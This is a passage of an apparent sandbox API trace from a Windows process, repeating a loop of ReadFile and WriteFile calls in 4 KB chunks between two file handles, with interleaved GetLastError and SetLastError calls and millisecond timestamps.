lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.259] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.259] GetLastError () returned 0x0 [0103.259] SetLastError (dwErrCode=0x0) [0103.259] GetLastError () returned 0x0 [0103.259] SetLastError (dwErrCode=0x0) [0103.259] GetLastError () returned 0x0 [0103.259] SetLastError (dwErrCode=0x0) [0103.259] GetLastError () returned 0x0 [0103.260] SetLastError (dwErrCode=0x0) [0103.260] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] GetLastError () returned 0x0 [0103.260] SetLastError (dwErrCode=0x0) [0103.260] GetLastError () returned 0x0 [0103.260] SetLastError (dwErrCode=0x0) [0103.260] GetLastError () returned 0x0 [0103.261] SetLastError (dwErrCode=0x0) [0103.261] GetLastError () returned 0x0 [0103.261] SetLastError (dwErrCode=0x0) [0103.261] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] GetLastError () returned 0x0 [0103.261] SetLastError (dwErrCode=0x0) [0103.261] GetLastError () returned 0x0 [0103.261] SetLastError (dwErrCode=0x0) [0103.261] GetLastError () returned 0x0 [0103.261] SetLastError (dwErrCode=0x0) [0103.262] GetLastError () returned 0x0 [0103.262] SetLastError (dwErrCode=0x0) [0103.262] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.262] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.262] GetLastError () returned 0x0 [0103.262] SetLastError (dwErrCode=0x0) [0103.262] GetLastError () returned 0x0 [0103.262] SetLastError (dwErrCode=0x0) [0103.262] GetLastError () returned 0x0 [0103.262] SetLastError (dwErrCode=0x0) [0103.262] GetLastError () returned 0x0 [0103.262] SetLastError (dwErrCode=0x0) [0103.263] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.263] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.263] GetLastError () returned 0x0 [0103.263] SetLastError (dwErrCode=0x0) [0103.263] GetLastError () returned 0x0 [0103.263] SetLastError (dwErrCode=0x0) [0103.263] GetLastError () returned 0x0 [0103.263] SetLastError (dwErrCode=0x0) [0103.263] GetLastError () returned 0x0 [0103.263] SetLastError (dwErrCode=0x0) [0103.263] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.265] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.265] GetLastError () returned 0x0 [0103.265] SetLastError (dwErrCode=0x0) [0103.265] GetLastError () returned 0x0 [0103.265] SetLastError (dwErrCode=0x0) [0103.265] GetLastError () returned 0x0 [0103.265] SetLastError (dwErrCode=0x0) [0103.266] GetLastError () returned 0x0 [0103.266] SetLastError (dwErrCode=0x0) [0103.266] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] GetLastError () returned 0x0 [0103.266] SetLastError (dwErrCode=0x0) [0103.266] GetLastError () returned 0x0 [0103.266] SetLastError (dwErrCode=0x0) [0103.266] GetLastError () returned 0x0 [0103.266] SetLastError (dwErrCode=0x0) [0103.266] GetLastError () returned 0x0 [0103.266] SetLastError (dwErrCode=0x0) [0103.267] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] GetLastError () returned 0x0 [0103.267] SetLastError (dwErrCode=0x0) [0103.267] GetLastError () returned 0x0 [0103.267] SetLastError (dwErrCode=0x0) [0103.267] GetLastError () returned 0x0 [0103.267] SetLastError (dwErrCode=0x0) [0103.267] GetLastError () returned 0x0 [0103.267] SetLastError (dwErrCode=0x0) [0103.267] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] GetLastError () returned 0x0 [0103.268] SetLastError (dwErrCode=0x0) [0103.268] GetLastError () returned 0x0 [0103.268] SetLastError (dwErrCode=0x0) [0103.268] GetLastError () returned 0x0 [0103.268] SetLastError (dwErrCode=0x0) [0103.268] GetLastError () returned 0x0 [0103.268] SetLastError (dwErrCode=0x0) [0103.268] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] GetLastError () returned 0x0 [0103.269] SetLastError (dwErrCode=0x0) [0103.269] GetLastError () returned 0x0 [0103.269] SetLastError (dwErrCode=0x0) [0103.269] GetLastError () returned 0x0 [0103.269] SetLastError (dwErrCode=0x0) [0103.269] GetLastError () returned 0x0 [0103.269] SetLastError (dwErrCode=0x0) [0103.269] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] GetLastError () returned 0x0 [0103.270] SetLastError (dwErrCode=0x0) [0103.270] GetLastError () returned 0x0 [0103.270] SetLastError (dwErrCode=0x0) [0103.270] GetLastError () returned 0x0 [0103.270] SetLastError (dwErrCode=0x0) [0103.270] GetLastError () returned 0x0 [0103.270] SetLastError (dwErrCode=0x0) [0103.270] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] GetLastError () returned 0x0 [0103.271] SetLastError (dwErrCode=0x0) [0103.271] GetLastError () returned 0x0 [0103.271] SetLastError (dwErrCode=0x0) [0103.271] GetLastError () returned 0x0 [0103.271] SetLastError (dwErrCode=0x0) [0103.271] GetLastError () returned 0x0 [0103.271] SetLastError (dwErrCode=0x0) [0103.271] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.271] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.271] GetLastError () returned 0x0 [0103.271] SetLastError (dwErrCode=0x0) [0103.272] GetLastError () returned 0x0 [0103.272] SetLastError (dwErrCode=0x0) [0103.272] GetLastError () returned 0x0 [0103.272] SetLastError (dwErrCode=0x0) [0103.272] GetLastError () returned 0x0 [0103.272] SetLastError (dwErrCode=0x0) [0103.272] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.272] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.272] GetLastError () returned 0x0 [0103.272] SetLastError (dwErrCode=0x0) [0103.272] GetLastError () returned 0x0 [0103.272] SetLastError (dwErrCode=0x0) [0103.273] GetLastError () returned 0x0 [0103.273] SetLastError (dwErrCode=0x0) [0103.273] GetLastError () returned 0x0 [0103.273] SetLastError (dwErrCode=0x0) [0103.273] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.273] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.273] GetLastError () returned 0x0 [0103.273] SetLastError (dwErrCode=0x0) [0103.273] GetLastError () returned 0x0 [0103.273] SetLastError (dwErrCode=0x0) [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.274] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.274] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.274] GetLastError () returned 0x0 [0103.274] SetLastError (dwErrCode=0x0) [0103.275] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.275] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.275] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.275] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.275] GetLastError () returned 0x0 [0103.275] SetLastError (dwErrCode=0x0) [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.276] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] GetLastError () returned 0x0 [0103.276] SetLastError (dwErrCode=0x0) [0103.276] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.277] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.277] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.277] GetLastError () returned 0x0 [0103.277] SetLastError (dwErrCode=0x0) [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.278] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.278] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.278] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.278] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.278] GetLastError () returned 0x0 [0103.278] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.279] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] GetLastError () returned 0x0 [0103.279] SetLastError (dwErrCode=0x0) [0103.279] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.279] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.280] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.280] GetLastError () returned 0x0 [0103.280] SetLastError (dwErrCode=0x0) [0103.281] GetLastError () returned 0x0 [0103.281] SetLastError (dwErrCode=0x0) [0103.281] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.281] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.281] GetLastError () returned 0x0 [0103.281] SetLastError (dwErrCode=0x0) [0103.281] GetLastError () returned 0x0 [0103.281] SetLastError (dwErrCode=0x0) [0103.281] GetLastError () returned 0x0 [0103.281] SetLastError (dwErrCode=0x0) [0103.281] GetLastError () returned 0x0 [0103.281] SetLastError (dwErrCode=0x0) [0103.281] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.281] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.281] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.282] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] GetLastError () returned 0x0 [0103.282] SetLastError (dwErrCode=0x0) [0103.282] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.282] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.283] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] GetLastError () returned 0x0 [0103.283] SetLastError (dwErrCode=0x0) [0103.283] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.284] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 